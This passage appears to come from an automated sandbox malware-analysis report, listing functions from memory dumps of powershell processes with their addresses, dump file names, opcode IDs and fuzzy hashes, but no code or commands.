                                                                                                  • Instruction ID: 9ce55f445c740a5571c5ac1e3a9ec27e1637646d57be83469a550d96fb95ec4a
                                                                                                  • Opcode Fuzzy Hash: 872d8605626af951eb64a2caed27491a18e16b3b11f712c9b2172226a683d6b4
                                                                                                  • Instruction Fuzzy Hash: 28316E30E0021C9FDB14DBA4D880BEDF7F6AFC9204F2484AAE415AB750CB34AD4ACB51
                                                                                                  Function 02C779AA Relevance: .1, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b181f92c0705325071d338189c91dea714e485fff12c385085dc944c079a1c00
                                                                                                  • Instruction ID: 2ef5dd97d8818f69921932e8793dd383b60913292a7ea313b6ac1e481008b542
                                                                                                  • Opcode Fuzzy Hash: b181f92c0705325071d338189c91dea714e485fff12c385085dc944c079a1c00
                                                                                                  • Instruction Fuzzy Hash: 9C316F30E0021C9FDB15EBA4D840BEDF7F6AFC9204F24846AE415A7750CB35AE4ACB51
                                                                                                  Function 02C77A45 Relevance: .1, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 16d5918142dcdaafac5d7d418922da67e0ab7e767981db6831dca134bb3bdd16
                                                                                                  • Instruction ID: 982c6c11b71715f80a6a68e6f21228552f3b1f52f329553c770d7bfbbdea9396
                                                                                                  • Opcode Fuzzy Hash: 16d5918142dcdaafac5d7d418922da67e0ab7e767981db6831dca134bb3bdd16
                                                                                                  • Instruction Fuzzy Hash: B8314E30E0021C9FDB14DBA5D980BEDF7F6AF89304F2484AAE415AB750DB35AD4ACB51
                                                                                                  Function 02B8D01D Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1418619637.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2b8d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3f3de4f5c3c09963256bfcbfb2dbc20b315c8ac71cf0e0eb05e8cafdca3555c6
                                                                                                  • Instruction ID: dca19785cdb0373ee394d0ffb060a7e68178adada05e5a727145c4ef70a052df
                                                                                                  • Opcode Fuzzy Hash: 3f3de4f5c3c09963256bfcbfb2dbc20b315c8ac71cf0e0eb05e8cafdca3555c6
                                                                                                  • Instruction Fuzzy Hash: 2801FD31108345EFE724AA32DC80B66FB98DF41224F08C0ABED4C0A282C7799841CAB2
                                                                                                  Function 02B8D006 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1418619637.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2b8d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cecf2b00053b2a9e1ce711a7982f9925097cb88576df822e8e486dbdfb083875
                                                                                                  • Instruction ID: 3f86e12a0eec23272d88c2b913b70ee9d050fcc8362faf0f02e37a59f0a22281
                                                                                                  • Opcode Fuzzy Hash: cecf2b00053b2a9e1ce711a7982f9925097cb88576df822e8e486dbdfb083875
                                                                                                  • Instruction Fuzzy Hash: 13015E6250E3C49FD7168B258C94B62BFB4DF52224F19C1DBD9888F1D3C2699848C772
                                                                                                  Function 02C76E58 Relevance: .0, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6da8a65c739aaa89915e67075d340dca6056d4b98e7d645130ae2e5d4af66f99
                                                                                                  • Instruction ID: 0b753403f53b000b2ff823348ed4f81d9ce7b2a21fe45b7febe3ce7edc7674d3
                                                                                                  • Opcode Fuzzy Hash: 6da8a65c739aaa89915e67075d340dca6056d4b98e7d645130ae2e5d4af66f99
                                                                                                  • Instruction Fuzzy Hash: D401E874A082098FC780DF68D4859AEBBF0FF49310F5152A9E905DB321D731A944CB91
                                                                                                  Function 02C77058 Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7708c0ab6907d3709cea7763445db55f1cf5d4a3c496c43e07e9cd70fe24ccb2
                                                                                                  • Instruction ID: c1e22beb7a772d78e8b428e7dd77b46d30b4d08ea307bc7175214d6be3e40ba6
                                                                                                  • Opcode Fuzzy Hash: 7708c0ab6907d3709cea7763445db55f1cf5d4a3c496c43e07e9cd70fe24ccb2
                                                                                                  • Instruction Fuzzy Hash: 46F0B430200304CFC7259B18E414B96B7A9FFC6718B0684EEE4088F761CB35DC89CBA1
                                                                                                  Function 02C76E68 Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a609dbc2c9b880614bae99da42ac8843775aa9a9a64df2767176032e5636ffd9
                                                                                                  • Instruction ID: 4ea0dbbc6487ba1e9d0f9dd4f9b3de737a283add7eb652eeb3a42c21943550b9
                                                                                                  • Opcode Fuzzy Hash: a609dbc2c9b880614bae99da42ac8843775aa9a9a64df2767176032e5636ffd9
                                                                                                  • Instruction Fuzzy Hash: 94F0A974E0420ACFC780DFA8C485AAEBBF4BF49310F504199D509DB321D730E951CB91
                                                                                                  Function 02C77555 Relevance: .0, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6452d7ec8145d00780c62e0a0541776ac77647c4c89c5564b02ee8d2a12c15c
                                                                                                  • Instruction ID: d3ee5a2098a642f5f1e5ba8346e3d2faa4df50c78dc8339c0fc63dce77d2cbb8
                                                                                                  • Opcode Fuzzy Hash: b6452d7ec8145d00780c62e0a0541776ac77647c4c89c5564b02ee8d2a12c15c
                                                                                                  • Instruction Fuzzy Hash: F2F03070A0030ADFEB04DBE0C556B6EB7B2AB40304F108964D5029F265CB78AD49CFC0

                                                                                                  Executed Functions

                                                                                                  Function 03EDD005 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000014.00000002.1646850289.0000000003EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_20_2_3edd000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c55e63403f140c752f19790af67c3b735a456d34770d6b5e28b102309cf36df1
                                                                                                  • Instruction ID: d912d7490752c4bf933a98345b536b2c8ee1c00907157afd1e835697c8572d33
                                                                                                  • Opcode Fuzzy Hash: c55e63403f140c752f19790af67c3b735a456d34770d6b5e28b102309cf36df1
                                                                                                  • Instruction Fuzzy Hash: 82012D6140E7C09FD7128B259C94B52BFB89F53228F1D81DBD9888F1A3C2699849C772
                                                                                                  Function 03EDD01D Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000014.00000002.1646850289.0000000003EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_20_2_3edd000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3354b7923b080621ea90b3b79647f9165926998ee4ab1441b552b7ed3cd56e7f
                                                                                                  • Instruction ID: d984734d032c52ed2262376123898fa76ea00cd18cdac4240c7aa36a5bc322c0
                                                                                                  • Opcode Fuzzy Hash: 3354b7923b080621ea90b3b79647f9165926998ee4ab1441b552b7ed3cd56e7f
                                                                                                  • Instruction Fuzzy Hash: 7501F731408340AFE720CB21EC80B67FBA8DF81224F08C259ED484E142C6789846C6B1